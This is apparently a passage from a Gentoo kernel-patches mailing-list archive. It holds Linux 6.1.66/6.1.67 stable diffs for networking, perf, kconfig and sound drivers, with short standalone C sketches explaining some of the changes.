+ 	pool = xs->pool;
+ 
+@@ -734,12 +734,11 @@ static __poll_t xsk_poll(struct file *file, struct socket *sock,
+ 			xsk_generic_xmit(sk);
+ 	}
+ 
+-skip_tx:
+ 	if (xs->rx && !xskq_prod_is_empty(xs->rx))
+ 		mask |= EPOLLIN | EPOLLRDNORM;
+ 	if (xs->tx && xsk_tx_writeable(xs))
+ 		mask |= EPOLLOUT | EPOLLWRNORM;
+-
++out:
+ 	rcu_read_unlock();
+ 	return mask;
+ }
+diff --git a/scripts/checkstack.pl b/scripts/checkstack.pl
+index d48dfed6d3dba..a0f9101d5fd44 100755
+--- a/scripts/checkstack.pl
++++ b/scripts/checkstack.pl
+@@ -146,15 +146,11 @@ $total_size = 0;
+ while (my $line = <STDIN>) {
+ 	if ($line =~ m/$funcre/) {
+ 		$func = $1;
+-		next if $line !~ m/^($xs*)/;
++		next if $line !~ m/^($x*)/;
+ 		if ($total_size > $min_stack) {
+ 			push @stack, "$intro$total_size\n";
+ 		}
+-
+-		$addr = $1;
+-		$addr =~ s/ /0/g;
+-		$addr = "0x$addr";
+-
++		$addr = "0x$1";
+ 		$intro = "$addr $func [$file]:";
+ 		my $padlen = 56 - length($intro);
+ 		while ($padlen > 0) {
+diff --git a/scripts/dtc/dt-extract-compatibles b/scripts/dtc/dt-extract-compatibles
+index a1119762ed086..9686a1cf85498 100755
+--- a/scripts/dtc/dt-extract-compatibles
++++ b/scripts/dtc/dt-extract-compatibles
+@@ -1,8 +1,8 @@
+ #!/usr/bin/env python3
+ # SPDX-License-Identifier: GPL-2.0-only
+ 
++import fnmatch
+ import os
+-import glob
+ import re
+ import argparse
+ 
+@@ -49,6 +49,24 @@ def print_compat(filename, compatibles):
+ 	else:
+ 		print(*compatibles, sep='\n')
+ 
++def glob_without_symlinks(root, glob):
++	for path, dirs, files in os.walk(root):
++		# Ignore hidden directories
++		for d in dirs:
++			if fnmatch.fnmatch(d, ".*"):
++				dirs.remove(d)
++		for f in files:
++			if fnmatch.fnmatch(f, glob):
++				yield os.path.join(path, f)
++
++def files_to_parse(path_args):
++	for f in path_args:
++		if os.path.isdir(f):
++			for filename in glob_without_symlinks(f, "*.c"):
++				yield filename
++		else:
++			yield f
++
+ show_filename = False
+ 
+ if __name__ == "__main__":
+@@ -59,11 +77,6 @@ if __name__ == "__main__":
+ 
+ 	show_filename = args.with_filename
+ 
+-	for f in args.cfile:
+-		if os.path.isdir(f):
+-			for filename in glob.iglob(f + "/**/*.c", recursive=True):
+-				compat_list = parse_compatibles(filename)
+-				print_compat(filename, compat_list)
+-		else:
+-			compat_list = parse_compatibles(f)
+-			print_compat(f, compat_list)
++	for f in files_to_parse(args.cfile):
++		compat_list = parse_compatibles(f)
++		print_compat(f, compat_list)
+diff --git a/scripts/kconfig/symbol.c b/scripts/kconfig/symbol.c
+index 0572330bf8a78..a76925b46ce63 100644
+--- a/scripts/kconfig/symbol.c
++++ b/scripts/kconfig/symbol.c
+@@ -122,9 +122,9 @@ static long long sym_get_range_val(struct symbol *sym, int base)
+ static void sym_validate_range(struct symbol *sym)
+ {
+ 	struct property *prop;
++	struct symbol *range_sym;
+ 	int base;
+ 	long long val, val2;
+-	char str[64];
+ 
+ 	switch (sym->type) {
+ 	case S_INT:
+@@ -140,17 +140,15 @@ static void sym_validate_range(struct symbol *sym)
+ 	if (!prop)
+ 		return;
+ 	val = strtoll(sym->curr.val, NULL, base);
+-	val2 = sym_get_range_val(prop->expr->left.sym, base);
++	range_sym = prop->expr->left.sym;
++	val2 = sym_get_range_val(range_sym, base);
+ 	if (val >= val2) {
+-		val2 = sym_get_range_val(prop->expr->right.sym, base);
++		range_sym = prop->expr->right.sym;
++		val2 = sym_get_range_val(range_sym, base);
+ 		if (val <= val2)
+ 			return;
+ 	}
+-	if (sym->type == S_INT)
+-		sprintf(str, "%lld", val2);
+-	else
+-		sprintf(str, "0x%llx", val2);
+-	sym->curr.val = xstrdup(str);
++	sym->curr.val = range_sym->curr.val;
+ }
+ 
+ static void sym_set_changed(struct symbol *sym)
+diff --git a/sound/core/pcm.c b/sound/core/pcm.c
+index 9d95e37311230..2415a3c3ac6c9 100644
+--- a/sound/core/pcm.c
++++ b/sound/core/pcm.c
+@@ -253,6 +253,7 @@ static const char * const snd_pcm_state_names[] = {
+ 	STATE(DRAINING),
+ 	STATE(PAUSED),
+ 	STATE(SUSPENDED),
++	STATE(DISCONNECTED),
+ };
+ 
+ static const char * const snd_pcm_access_names[] = {
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index d1944c83b03a2..c6cae3369a6a1 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -10031,6 +10031,8 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x8086, 0x2081, "Intel NUC 10", ALC256_FIXUP_INTEL_NUC10),
+ 	SND_PCI_QUIRK(0x8086, 0x3038, "Intel NUC 13", ALC295_FIXUP_CHROME_BOOK),
+ 	SND_PCI_QUIRK(0xf111, 0x0001, "Framework Laptop", ALC295_FIXUP_FRAMEWORK_LAPTOP_MIC_NO_PRESENCE),
++	SND_PCI_QUIRK(0xf111, 0x0005, "Framework Laptop", ALC295_FIXUP_FRAMEWORK_LAPTOP_MIC_NO_PRESENCE),
++	SND_PCI_QUIRK(0xf111, 0x0006, "Framework Laptop", ALC295_FIXUP_FRAMEWORK_LAPTOP_MIC_NO_PRESENCE),
+ 
+ #if 0
+ 	/* Below is a quirk table taken from the old code.
+@@ -11952,6 +11954,7 @@ static const struct snd_pci_quirk alc662_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x17aa, 0x32f7, "Lenovo ThinkCentre M90", ALC897_FIXUP_HEADSET_MIC_PIN),
+ 	SND_PCI_QUIRK(0x17aa, 0x3321, "Lenovo ThinkCentre M70 Gen4", ALC897_FIXUP_HEADSET_MIC_PIN),
+ 	SND_PCI_QUIRK(0x17aa, 0x331b, "Lenovo ThinkCentre M90 Gen4", ALC897_FIXUP_HEADSET_MIC_PIN),
++	SND_PCI_QUIRK(0x17aa, 0x3364, "Lenovo ThinkCentre M90 Gen5", ALC897_FIXUP_HEADSET_MIC_PIN),
+ 	SND_PCI_QUIRK(0x17aa, 0x3742, "Lenovo TianYi510Pro-14IOB", ALC897_FIXUP_HEADSET_MIC_PIN2),
+ 	SND_PCI_QUIRK(0x17aa, 0x38af, "Lenovo Ideapad Y550P", ALC662_FIXUP_IDEAPAD),
+ 	SND_PCI_QUIRK(0x17aa, 0x3a0d, "Lenovo Ideapad Y550", ALC662_FIXUP_IDEAPAD),
+diff --git a/sound/soc/amd/yc/acp6x-mach.c b/sound/soc/amd/yc/acp6x-mach.c
+index c494de5f5c066..1dde1f3196acc 100644
+--- a/sound/soc/amd/yc/acp6x-mach.c
++++ b/sound/soc/amd/yc/acp6x-mach.c
+@@ -283,6 +283,13 @@ static const struct dmi_system_id yc_acp_quirk_table[] = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "M6500RC"),
+ 		}
+ 	},
++	{
++		.driver_data = &acp6x_card,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "ASUSTeK COMPUTER INC."),
++			DMI_MATCH(DMI_PRODUCT_NAME, "E1504FA"),
++		}
++	},
+ 	{
+ 		.driver_data = &acp6x_card,
+ 		.matches = {
+diff --git a/sound/soc/codecs/lpass-tx-macro.c b/sound/soc/codecs/lpass-tx-macro.c
+index 9f59518005a5f..840bbe991cd3a 100644
+--- a/sound/soc/codecs/lpass-tx-macro.c
++++ b/sound/soc/codecs/lpass-tx-macro.c
+@@ -1871,6 +1871,11 @@ static int tx_macro_probe(struct platform_device *pdev)
+ 
+ 	tx->dev = dev;
+ 
++	/* Set active_decimator default value */
++	tx->active_decimator[TX_MACRO_AIF1_CAP] = -1;
++	tx->active_decimator[TX_MACRO_AIF2_CAP] = -1;
++	tx->active_decimator[TX_MACRO_AIF3_CAP] = -1;
++
+ 	/* set MCLK and NPL rates */
+ 	clk_set_rate(tx->mclk, MCLK_FREQ);
+ 	clk_set_rate(tx->npl, MCLK_FREQ);
+diff --git a/sound/soc/codecs/wm_adsp.c b/sound/soc/codecs/wm_adsp.c
+index 8a2e9771bb50e..2cfca78f0401f 100644
+--- a/sound/soc/codecs/wm_adsp.c
++++ b/sound/soc/codecs/wm_adsp.c
+@@ -1401,12 +1401,12 @@ static int wm_adsp_buffer_populate(struct wm_adsp_compr_buf *buf)
+ 		ret = wm_adsp_buffer_read(buf, caps->region_defs[i].base_offset,
+ 					  &region->base_addr);
+ 		if (ret < 0)
+-			return ret;
++			goto err;
+ 
+ 		ret = wm_adsp_buffer_read(buf, caps->region_defs[i].size_offset,
+ 					  &offset);
+ 		if (ret < 0)
+-			return ret;
++			goto err;
+ 
+ 		region->cumulative_size = offset;
+ 
+@@ -1417,6 +1417,10 @@ static int wm_adsp_buffer_populate(struct wm_adsp_compr_buf *buf)
+ 	}
+ 
+ 	return 0;
++
++err:
++	kfree(buf->regions);
++	return ret;
+ }
+ 
+ static void wm_adsp_buffer_clear(struct wm_adsp_compr_buf *buf)
+diff --git a/sound/soc/fsl/fsl_sai.c b/sound/soc/fsl/fsl_sai.c
+index 96fd9095e544b..6364d9be28fbb 100644
+--- a/sound/soc/fsl/fsl_sai.c
++++ b/sound/soc/fsl/fsl_sai.c
+@@ -674,6 +674,20 @@ static int fsl_sai_hw_params(struct snd_pcm_substream *substream,
+ 			   FSL_SAI_CR3_TRCE_MASK,
+ 			   FSL_SAI_CR3_TRCE((dl_cfg[dl_cfg_idx].mask[tx] & trce_mask)));
+ 
++	/*
++	 * When the TERE and FSD_MSTR enabled before configuring the word width
++	 * There will be no frame sync clock issue, because word width impact
++	 * the generation of frame sync clock.
++	 *
++	 * TERE enabled earlier only for i.MX8MP case for the hardware limitation,
++	 * We need to disable FSD_MSTR before configuring word width, then enable
++	 * FSD_MSTR bit for this specific case.
++	 */
++	if (sai->soc_data->mclk_with_tere && sai->mclk_direction_output &&
++	    !sai->is_consumer_mode)
++		regmap_update_bits(sai->regmap, FSL_SAI_xCR4(tx, ofs),
++				   FSL_SAI_CR4_FSD_MSTR, 0);
++
+ 	regmap_update_bits(sai->regmap, FSL_SAI_xCR4(tx, ofs),
+ 			   FSL_SAI_CR4_SYWD_MASK | FSL_SAI_CR4_FRSZ_MASK |
+ 			   FSL_SAI_CR4_CHMOD_MASK,
+@@ -681,6 +695,13 @@ static int fsl_sai_hw_params(struct snd_pcm_substream *substream,
+ 	regmap_update_bits(sai->regmap, FSL_SAI_xCR5(tx, ofs),
+ 			   FSL_SAI_CR5_WNW_MASK | FSL_SAI_CR5_W0W_MASK |
+ 			   FSL_SAI_CR5_FBT_MASK, val_cr5);
++
++	/* Enable FSD_MSTR after configuring word width */
++	if (sai->soc_data->mclk_with_tere && sai->mclk_direction_output &&
++	    !sai->is_consumer_mode)
++		regmap_update_bits(sai->regmap, FSL_SAI_xCR4(tx, ofs),
++				   FSL_SAI_CR4_FSD_MSTR, FSL_SAI_CR4_FSD_MSTR);
++
+ 	regmap_write(sai->regmap, FSL_SAI_xMR(tx),
+ 		     ~0UL - ((1 << min(channels, slots)) - 1));
+ 
+diff --git a/sound/usb/mixer_quirks.c b/sound/usb/mixer_quirks.c
+index ab0d459f42715..1f32e3ae3aa31 100644
+--- a/sound/usb/mixer_quirks.c
++++ b/sound/usb/mixer_quirks.c
+@@ -2978,6 +2978,7 @@ static int snd_bbfpro_controls_create(struct usb_mixer_interface *mixer)
+ #define SND_DJM_850_IDX		0x2
+ #define SND_DJM_900NXS2_IDX	0x3
+ #define SND_DJM_750MK2_IDX	0x4
++#define SND_DJM_450_IDX		0x5
+ 
+ 
+ #define SND_DJM_CTL(_name, suffix, _default_value, _windex) { \
+@@ -3108,6 +3109,31 @@ static const struct snd_djm_ctl snd_djm_ctls_250mk2[] = {
+ };
+ 
+ 
++// DJM-450
++static const u16 snd_djm_opts_450_cap1[] = {
++	0x0103, 0x0100, 0x0106, 0x0107, 0x0108, 0x0109, 0x010d, 0x010a };
++
++static const u16 snd_djm_opts_450_cap2[] = {
++	0x0203, 0x0200, 0x0206, 0x0207, 0x0208, 0x0209, 0x020d, 0x020a };
++
++static const u16 snd_djm_opts_450_cap3[] = {
++	0x030a, 0x0311, 0x0312, 0x0307, 0x0308, 0x0309, 0x030d };
++
++static const u16 snd_djm_opts_450_pb1[] = { 0x0100, 0x0101, 0x0104 };
++static const u16 snd_djm_opts_450_pb2[] = { 0x0200, 0x0201, 0x0204 };
++static const u16 snd_djm_opts_450_pb3[] = { 0x0300, 0x0301, 0x0304 };
++
++static const struct snd_djm_ctl snd_djm_ctls_450[] = {
++	SND_DJM_CTL("Capture Level", cap_level, 0, SND_DJM_WINDEX_CAPLVL),
++	SND_DJM_CTL("Ch1 Input",   450_cap1, 2, SND_DJM_WINDEX_CAP),
++	SND_DJM_CTL("Ch2 Input",   450_cap2, 2, SND_DJM_WINDEX_CAP),
++	SND_DJM_CTL("Ch3 Input",   450_cap3, 0, SND_DJM_WINDEX_CAP),
++	SND_DJM_CTL("Ch1 Output",   450_pb1, 0, SND_DJM_WINDEX_PB),
++	SND_DJM_CTL("Ch2 Output",   450_pb2, 1, SND_DJM_WINDEX_PB),
++	SND_DJM_CTL("Ch3 Output",   450_pb3, 2, SND_DJM_WINDEX_PB)
++};
++
++
+ // DJM-750
+ static const u16 snd_djm_opts_750_cap1[] = {
+ 	0x0101, 0x0103, 0x0106, 0x0107, 0x0108, 0x0109, 0x010a, 0x010f };
+@@ -3203,6 +3229,7 @@ static const struct snd_djm_device snd_djm_devices[] = {
+ 	[SND_DJM_850_IDX] = SND_DJM_DEVICE(850),
+ 	[SND_DJM_900NXS2_IDX] = SND_DJM_DEVICE(900nxs2),
+ 	[SND_DJM_750MK2_IDX] = SND_DJM_DEVICE(750mk2),
++	[SND_DJM_450_IDX] = SND_DJM_DEVICE(450),
+ };
+ 
+ 
+@@ -3449,6 +3476,9 @@ int snd_usb_mixer_apply_create_quirk(struct usb_mixer_interface *mixer)
+ 	case USB_ID(0x2b73, 0x0017): /* Pioneer DJ DJM-250MK2 */
+ 		err = snd_djm_controls_create(mixer, SND_DJM_250MK2_IDX);
+ 		break;
++	case USB_ID(0x2b73, 0x0013): /* Pioneer DJ DJM-450 */
++		err = snd_djm_controls_create(mixer, SND_DJM_450_IDX);
++		break;
+ 	case USB_ID(0x08e4, 0x017f): /* Pioneer DJ DJM-750 */
+ 		err = snd_djm_controls_create(mixer, SND_DJM_750_IDX);
+ 		break;

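For reference, the size check introduced in the kernel/events/core.c hunk
above is easy to model outside the kernel. The sketch below is a minimal
standalone illustration, not kernel code: the FMT_* constants mirror the
PERF_FORMAT_* flags from the uapi perf_event.h, and read_size() follows
the new __perf_event_read_size() so the 16k per-event cap enforced by
perf_event_validate_size() can be checked numerically.

/* Userspace model of __perf_event_read_size(); FMT_* values match the
 * uapi PERF_FORMAT_* flag values. */
#include <stdio.h>
#include <stdint.h>

#define FMT_TOTAL_TIME_ENABLED	(1ULL << 0)
#define FMT_TOTAL_TIME_RUNNING	(1ULL << 1)
#define FMT_ID			(1ULL << 2)
#define FMT_GROUP		(1ULL << 3)
#define FMT_LOST		(1ULL << 4)

static int read_size(uint64_t read_format, int nr_siblings)
{
	int entry = sizeof(uint64_t);	/* value */
	int size = 0;
	int nr = 1;

	if (read_format & FMT_TOTAL_TIME_ENABLED)
		size += sizeof(uint64_t);
	if (read_format & FMT_TOTAL_TIME_RUNNING)
		size += sizeof(uint64_t);
	if (read_format & FMT_ID)
		entry += sizeof(uint64_t);
	if (read_format & FMT_LOST)
		entry += sizeof(uint64_t);
	if (read_format & FMT_GROUP) {
		nr += nr_siblings;
		size += sizeof(uint64_t);
	}
	return size + nr * entry;
}

int main(void)
{
	uint64_t fmt = FMT_GROUP | FMT_ID | FMT_LOST;
	int siblings = 0;

	/* Each sibling adds one 24-byte entry with this read_format. */
	while (read_size(fmt, siblings) <= 16 * 1024)
		siblings++;
	printf("read_size first exceeds 16k at %d siblings\n", siblings);
	return 0;
}

With PERF_FORMAT_GROUP, ID and LOST set, each group member costs 24
bytes, so the new validation starts rejecting additions at 682 siblings
for this exact read_format, well before the 64k record limit mentioned
in the comment the hunk adds.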

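Likewise, the option walk added in nft_exthdr_dccp_eval() follows the
RFC 4340 layout its comment describes. Below is a minimal standalone
sketch of the same loop with an invented sample buffer; the kernel code
instead reads the options through skb_header_pointer() in two-byte
chunks and stores the result with nft_reg_store8().

/* Walk a DCCP option block; types 0..31 are single-byte options, all
 * others carry a length byte that counts the type and length bytes
 * themselves. Returns 1 if the wanted option type is present. */
#include <stdio.h>
#include <stdint.h>
#include <stddef.h>

#define DCCPO_MAX_RESERVED	31

static int dccp_opt_present(const uint8_t *opts, size_t optlen, uint8_t want)
{
	size_t i = 0;

	while (i < optlen) {
		uint8_t type = opts[i];

		if (type == want)
			return 1;
		if (type <= DCCPO_MAX_RESERVED) {
			i++;			/* 1-byte option */
			continue;
		}
		if (optlen - i < 2)		/* truncated multi-byte option */
			return 0;
		if (opts[i + 1] < 2)		/* malformed length */
			return 0;
		i += opts[i + 1];
	}
	return 0;
}

int main(void)
{
	/* two Padding bytes, a Timestamp option (type 41, length 6),
	 * then a single-byte Slow Receiver option (type 2) */
	const uint8_t opts[] = { 0, 0, 41, 6, 0xde, 0xad, 0xbe, 0xef, 2 };

	printf("timestamp present: %d\n",
	       dccp_opt_present(opts, sizeof(opts), 41));
	printf("ack vector present: %d\n",
	       dccp_opt_present(opts, sizeof(opts), 38));
	return 0;
}
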
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-12-11 14:20 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-12-11 14:20 UTC (permalink / raw
  To: gentoo-commits

commit:     38a5712dd639ae25005f19ae1d210b2fe87ecad6
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Mon Dec 11 14:19:59 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Mon Dec 11 14:19:59 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=38a5712d

Linux patch 6.1.67

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |   4 ++
 1066_linux-6.1.67.patch | 122 ++++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 126 insertions(+)

diff --git a/0000_README b/0000_README
index 37486bab..5f228fc4 100644
--- a/0000_README
+++ b/0000_README
@@ -307,6 +307,10 @@ Patch:  1065_linux-6.1.66.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.66
 
+Patch:  1066_linux-6.1.67.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.67
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1066_linux-6.1.67.patch b/1066_linux-6.1.67.patch
new file mode 100644
index 00000000..38a86e85
--- /dev/null
+++ b/1066_linux-6.1.67.patch
@@ -0,0 +1,122 @@
+diff --git a/Makefile b/Makefile
+index 5d7e995d686c8..c27600b90cad2 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 66
++SUBLEVEL = 67
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/net/wireless/core.h b/net/wireless/core.h
+index ee980965a7cfb..e1accacc6f233 100644
+--- a/net/wireless/core.h
++++ b/net/wireless/core.h
+@@ -297,7 +297,6 @@ struct cfg80211_cqm_config {
+ 	u32 rssi_hyst;
+ 	s32 last_rssi_event_value;
+ 	enum nl80211_cqm_rssi_threshold_event last_rssi_event_type;
+-	bool use_range_api;
+ 	int n_rssi_thresholds;
+ 	s32 rssi_thresholds[];
+ };
+diff --git a/net/wireless/nl80211.c b/net/wireless/nl80211.c
+index 42c858219b341..b19b5acfaf3a9 100644
+--- a/net/wireless/nl80211.c
++++ b/net/wireless/nl80211.c
+@@ -12574,6 +12574,10 @@ static int cfg80211_cqm_rssi_update(struct cfg80211_registered_device *rdev,
+ 	int i, n, low_index;
+ 	int err;
+ 
++	/* RSSI reporting disabled? */
++	if (!cqm_config)
++		return rdev_set_cqm_rssi_range_config(rdev, dev, 0, 0);
++
+ 	/*
+ 	 * Obtain current RSSI value if possible, if not and no RSSI threshold
+ 	 * event has been received yet, we should receive an event after a
+@@ -12648,6 +12652,18 @@ static int nl80211_set_cqm_rssi(struct genl_info *info,
+ 	    wdev->iftype != NL80211_IFTYPE_P2P_CLIENT)
+ 		return -EOPNOTSUPP;
+ 
++	if (n_thresholds <= 1 && rdev->ops->set_cqm_rssi_config) {
++		if (n_thresholds == 0 || thresholds[0] == 0) /* Disabling */
++			return rdev_set_cqm_rssi_config(rdev, dev, 0, 0);
++
++		return rdev_set_cqm_rssi_config(rdev, dev,
++						thresholds[0], hysteresis);
++	}
++
++	if (!wiphy_ext_feature_isset(&rdev->wiphy,
++				     NL80211_EXT_FEATURE_CQM_RSSI_LIST))
++		return -EOPNOTSUPP;
++
+ 	if (n_thresholds == 1 && thresholds[0] == 0) /* Disabling */
+ 		n_thresholds = 0;
+ 
+@@ -12655,20 +12671,6 @@ static int nl80211_set_cqm_rssi(struct genl_info *info,
+ 	old = rcu_dereference_protected(wdev->cqm_config,
+ 					lockdep_is_held(&wdev->mtx));
+ 
+-	/* if already disabled just succeed */
+-	if (!n_thresholds && !old)
+-		return 0;
+-
+-	if (n_thresholds > 1) {
+-		if (!wiphy_ext_feature_isset(&rdev->wiphy,
+-					     NL80211_EXT_FEATURE_CQM_RSSI_LIST) ||
+-		    !rdev->ops->set_cqm_rssi_range_config)
+-			return -EOPNOTSUPP;
+-	} else {
+-		if (!rdev->ops->set_cqm_rssi_config)
+-			return -EOPNOTSUPP;
+-	}
+-
+ 	if (n_thresholds) {
+ 		cqm_config = kzalloc(struct_size(cqm_config, rssi_thresholds,
+ 						 n_thresholds),
+@@ -12683,26 +12685,13 @@ static int nl80211_set_cqm_rssi(struct genl_info *info,
+ 		memcpy(cqm_config->rssi_thresholds, thresholds,
+ 		       flex_array_size(cqm_config, rssi_thresholds,
+ 				       n_thresholds));
+-		cqm_config->use_range_api = n_thresholds > 1 ||
+-					    !rdev->ops->set_cqm_rssi_config;
+ 
+ 		rcu_assign_pointer(wdev->cqm_config, cqm_config);
+-
+-		if (cqm_config->use_range_api)
+-			err = cfg80211_cqm_rssi_update(rdev, dev, cqm_config);
+-		else
+-			err = rdev_set_cqm_rssi_config(rdev, dev,
+-						       thresholds[0],
+-						       hysteresis);
+ 	} else {
+ 		RCU_INIT_POINTER(wdev->cqm_config, NULL);
+-		/* if enabled as range also disable via range */
+-		if (old->use_range_api)
+-			err = rdev_set_cqm_rssi_range_config(rdev, dev, 0, 0);
+-		else
+-			err = rdev_set_cqm_rssi_config(rdev, dev, 0, 0);
+ 	}
+ 
++	err = cfg80211_cqm_rssi_update(rdev, dev, cqm_config);
+ 	if (err) {
+ 		rcu_assign_pointer(wdev->cqm_config, old);
+ 		kfree_rcu(cqm_config, rcu_head);
+@@ -18769,11 +18758,10 @@ void cfg80211_cqm_rssi_notify_work(struct wiphy *wiphy, struct wiphy_work *work)
+ 	wdev_lock(wdev);
+ 	cqm_config = rcu_dereference_protected(wdev->cqm_config,
+ 					       lockdep_is_held(&wdev->mtx));
+-	if (!cqm_config)
++	if (!wdev->cqm_config)
+ 		goto unlock;
+ 
+-	if (cqm_config->use_range_api)
+-		cfg80211_cqm_rssi_update(rdev, wdev->netdev, cqm_config);
++	cfg80211_cqm_rssi_update(rdev, wdev->netdev, cqm_config);
+ 
+ 	rssi_level = cqm_config->last_rssi_event_value;
+ 	rssi_event = cqm_config->last_rssi_event_type;

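The 6.1.67 change above collapses the two nl80211 CQM code paths: with at most one threshold and a driver that implements set_cqm_rssi_config, the request goes straight to that op (including the 0/0 disable case); everything else now requires the NL80211_EXT_FEATURE_CQM_RSSI_LIST feature and is funneled through cfg80211_cqm_rssi_update(), which also handles disabling when cqm_config is NULL. Below is a minimal stand-alone C sketch of that dispatch order only; pick_cqm_path and the two booleans standing in for rdev->ops->set_cqm_rssi_config and the CQM_RSSI_LIST feature flag are illustrative names, not kernel API.

	#include <stdio.h>
	#include <stdbool.h>

	enum cqm_path {
		CQM_DISABLE_VIA_CONFIG,	/* rdev_set_cqm_rssi_config(rdev, dev, 0, 0) */
		CQM_SINGLE_VIA_CONFIG,	/* rdev_set_cqm_rssi_config(..., thr, hyst) */
		CQM_VIA_RANGE_UPDATE,	/* cfg80211_cqm_rssi_update() / range API */
		CQM_NOT_SUPPORTED	/* -EOPNOTSUPP */
	};

	/* Hypothetical helper; mirrors only the decision order of the patch above. */
	static enum cqm_path pick_cqm_path(int n_thresholds, const int *thresholds,
					   bool has_config_op, bool has_range_feature)
	{
		/* Zero or one threshold prefers the simple per-driver config op. */
		if (n_thresholds <= 1 && has_config_op) {
			if (n_thresholds == 0 || thresholds[0] == 0)
				return CQM_DISABLE_VIA_CONFIG;	/* disabling */
			return CQM_SINGLE_VIA_CONFIG;
		}
		/* Everything else needs the CQM_RSSI_LIST extended feature. */
		if (!has_range_feature)
			return CQM_NOT_SUPPORTED;
		return CQM_VIA_RANGE_UPDATE;
	}

	int main(void)
	{
		const int one[] = { -70 };
		const int two[] = { -70, -60 };

		printf("%d %d %d\n",
		       pick_cqm_path(1, one, true, false),	/* 1: single via config */
		       pick_cqm_path(2, two, true, true),	/* 2: range update */
		       pick_cqm_path(2, two, true, false));	/* 3: unsupported */
		return 0;
	}

Keeping the disable case inside cfg80211_cqm_rssi_update() is what lets the notify worker call the same function unconditionally, which is why the patch drops the use_range_api field and the per-path disable branches.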

* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-12-08 10:55 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-12-08 10:55 UTC (permalink / raw
  To: gentoo-commits

commit:     bd4a200f012c938193a86da7d829c88acee96bda
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Fri Dec  8 10:55:00 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Fri Dec  8 10:55:00 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=bd4a200f

Linux patch 6.1.66

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1065_linux-6.1.66.patch | 4837 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 4841 insertions(+)

diff --git a/0000_README b/0000_README
index 08e6f2e1..37486bab 100644
--- a/0000_README
+++ b/0000_README
@@ -303,6 +303,10 @@ Patch:  1064_linux-6.1.65.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.65
 
+Patch:  1065_linux-6.1.66.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.66
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1065_linux-6.1.66.patch b/1065_linux-6.1.66.patch
new file mode 100644
index 00000000..eae06551
--- /dev/null
+++ b/1065_linux-6.1.66.patch
@@ -0,0 +1,4837 @@
+diff --git a/Makefile b/Makefile
+index 1646e334a647f..5d7e995d686c8 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 65
++SUBLEVEL = 66
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm/xen/enlighten.c b/arch/arm/xen/enlighten.c
+index d12fdb9c05a89..eace3607fef41 100644
+--- a/arch/arm/xen/enlighten.c
++++ b/arch/arm/xen/enlighten.c
+@@ -204,7 +204,7 @@ static void xen_power_off(void)
+ 
+ static irqreturn_t xen_arm_callback(int irq, void *arg)
+ {
+-	xen_hvm_evtchn_do_upcall();
++	xen_evtchn_do_upcall();
+ 	return IRQ_HANDLED;
+ }
+ 
+diff --git a/arch/parisc/include/asm/alternative.h b/arch/parisc/include/asm/alternative.h
+index 1ed45fd085d3b..1eb488f25b838 100644
+--- a/arch/parisc/include/asm/alternative.h
++++ b/arch/parisc/include/asm/alternative.h
+@@ -34,7 +34,8 @@ void apply_alternatives(struct alt_instr *start, struct alt_instr *end,
+ 
+ /* Alternative SMP implementation. */
+ #define ALTERNATIVE(cond, replacement)		"!0:"	\
+-	".section .altinstructions, \"aw\"	!"	\
++	".section .altinstructions, \"a\"	!"	\
++	".align 4				!"	\
+ 	".word (0b-4-.)				!"	\
+ 	".hword 1, " __stringify(cond) "	!"	\
+ 	".word " __stringify(replacement) "	!"	\
+@@ -44,7 +45,8 @@ void apply_alternatives(struct alt_instr *start, struct alt_instr *end,
+ 
+ /* to replace one single instructions by a new instruction */
+ #define ALTERNATIVE(from, to, cond, replacement)\
+-	.section .altinstructions, "aw"	!	\
++	.section .altinstructions, "a"	!	\
++	.align 4			!	\
+ 	.word (from - .)		!	\
+ 	.hword (to - from)/4, cond	!	\
+ 	.word replacement		!	\
+@@ -52,7 +54,8 @@ void apply_alternatives(struct alt_instr *start, struct alt_instr *end,
+ 
+ /* to replace multiple instructions by new code */
+ #define ALTERNATIVE_CODE(from, num_instructions, cond, new_instr_ptr)\
+-	.section .altinstructions, "aw"	!	\
